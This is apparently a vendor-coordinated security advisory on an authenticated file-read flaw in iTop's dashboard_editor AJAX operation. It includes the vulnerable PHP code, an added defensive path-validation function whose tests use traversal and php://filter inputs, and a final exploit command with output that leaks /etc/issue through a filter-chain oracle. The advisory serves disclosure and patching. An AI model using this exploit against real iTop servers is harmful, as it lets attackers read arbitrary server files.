File read in iTop

15/04/2024

Fixed Version(s)

3.0.4, 3.1.1

Affected Version(s)

≤ 3.0.3

CVE Number



Jérôme Mampianinazakason



iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.


Synacktiv discovered a file read vulnerability in the iTop project, caused by missing validation of a user-provided parameter. It is exploitable only by an authenticated user of the application's back office.


Date        Description
2023.07.10  Advisory sent to
2023.07.19  Vulnerabilities acknowledged
2023.11.28  Release of version 3.1.1
2024.01.17  Release of version 3.0.4
2024.04.15  Public release


Technical details


The vulnerability resides in a call to the file_get_contents() function on a user-supplied parameter that is never validated.

The AJAX operation dashboard_editor allows any user authenticated on the back office to supply a file argument. This value is passed unchanged to the static method RuntimeDashboard::GetDashboardToEdit(), which uses it to load a dashboard definition from a file, as shown in the following extract of the pages/ajax.render.php file, line 1048:

case 'dashboard_editor':
    $sId = utils::ReadParam('id', '', false, 'context_param');
    // 'file' is accepted as an arbitrary string: nothing restricts it to a dashboard definition path
    $sDashboardFile = utils::ReadParam('file', '', false, 'string');
    $sReloadURL = utils::ReadParam('reload_url', '', false, utils::ENUM_SANITIZATION_FILTER_URL);
    // the user-controlled value is handed over as-is
    $oDashboard = RuntimeDashboard::GetDashboardToEdit($sDashboardFile, $sId);
    if (!is_null($oDashboard)) {
        if (!empty($sReloadURL)) {
            // ... (elided in this extract)
        }
        $oDashboard->RenderEditor($oPage, $aExtraParams);
    }
    break;



This method performs no check on the file path before reading the file's content:

    public static function GetDashboardToEdit($sDashboardFile, $sDashBoardId)
    {
        $bCustomized = false;
        // Search for an eventual user defined dashboard
        $oUDSearch = new DBObjectSearch('UserDashboard');
        $oUDSearch->AddCondition('user_id', UserRights::GetUserId(), '=');
        $oUDSearch->AddCondition('menu_code', $sDashBoardId, '=');
        $oUDSet = new DBObjectSet($oUDSearch);
        // if id is in the database, read from it
        if ($oUDSet->Count() > 0) {
            // Assuming there is at most one couple {user, menu}!
            $oUserDashboard = $oUDSet->Fetch();
            $sDashboardDefinition = $oUserDashboard->Get('contents');
            $bCustomized = true;
        } else {
            // Else read from file: $sDashboardFile comes straight from the request,
            // so any path or stream wrapper (php://filter, ...) is accepted here
            $sDashboardDefinition = @file_get_contents($sDashboardFile);
        }

        // init dashboard from the content
        // ... (remainder of the method elided in this extract)

If no user dashboard matching the supplied id exists for the current user, the else branch is taken and the user-supplied file value is passed directly to file_get_contents(). Since the id is also attacker-controlled, sending a value that matches no dashboard is enough to reach that branch.
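As an added example (not code from the iTop project, and not the fix shipped in 3.0.4 and 3.1.1), the resolver below shows one way to validate the file parameter before it reaches file_get_contents(): accept only a bare file name ending in .xml, resolve it under a fixed dashboards directory, and check the canonical path is still inside that directory. The function name ResolveDashboardFile and the dashboards directory layout are assumptions for this example; the self-check at the end uses a temporary directory constructed on the spot.

```php
<?php
// Added example, not the iTop project's own code: an allow-list style resolver
// for the 'file' parameter of the dashboard_editor operation.
// Assumption: dashboard definitions live as .xml files under a single directory
// ($sDashboardDir) and the request is only allowed to name one of them.

function ResolveDashboardFile(string $sRequestedFile, string $sDashboardDir): ?string
{
    // Reject empty values and anything that is not a bare file name: no directory
    // separators (so no traversal) and no scheme prefix (so no php://filter, phar://, ...)
    if ($sRequestedFile === '' || preg_match('#[/\\\\]|^[a-z0-9+.-]+:#i', $sRequestedFile)) {
        return null;
    }
    // Only dashboard definitions are legitimate targets
    if (!preg_match('/^[A-Za-z0-9_.-]+\.xml$/', $sRequestedFile)) {
        return null;
    }
    $sBaseDir = realpath($sDashboardDir);
    $sFullPath = realpath($sDashboardDir . DIRECTORY_SEPARATOR . $sRequestedFile);
    if ($sBaseDir === false || $sFullPath === false) {
        return null; // directory missing, or the file does not exist
    }
    // realpath() has resolved symlinks and '..': enforce containment on the canonical path
    if (strncmp($sFullPath, $sBaseDir . DIRECTORY_SEPARATOR, strlen($sBaseDir) + 1) !== 0) {
        return null;
    }
    return $sFullPath;
}

// Self-check against a constructed temporary directory (not real iTop data)
$sDir = sys_get_temp_dir() . '/dashboards_' . bin2hex(random_bytes(4));
mkdir($sDir);
file_put_contents($sDir . '/welcome.xml', '<dashboard/>');

$aCases = [
    'welcome.xml'                                             => true,  // legitimate dashboard
    '../../../../etc/passwd'                                  => false, // traversal
    '/etc/issue'                                              => false, // absolute path
    'php://filter/convert.base64-encode/resource=/etc/issue'  => false, // filter chain vector
    'missing.xml'                                             => false, // well-formed name, no such file
];
foreach ($aCases as $sInput => $bExpected) {
    $bGot = ResolveDashboardFile($sInput, $sDir) !== null;
    printf("%-58s %s\n", $sInput, $bGot === $bExpected ? 'ok' : 'FAIL');
}

unlink($sDir . '/welcome.xml');
rmdir($sDir);
```

The containment check is done on the output of realpath() rather than on the raw string, so a symlink placed inside the dashboards directory cannot be used to point outside of it; rejecting separators and scheme prefixes up front additionally keeps stream wrappers such as php://filter, which the oracle technique below depends on, from ever reaching file_get_contents().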



The content of the file is consumed as a dashboard definition and is not reflected in the response, so the primitive is blind. Using this vulnerability together with the php_filter_chains_oracle_exploit tool, which wraps the target path in php://filter chains to turn a blind file_get_contents() into an error-based, byte-by-byte oracle, it is possible to read arbitrary files on the remote server. The id below is chosen so that no user dashboard matches it, forcing the file branch:

$ python3 --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
Debian GNU/Linux 11 \n \l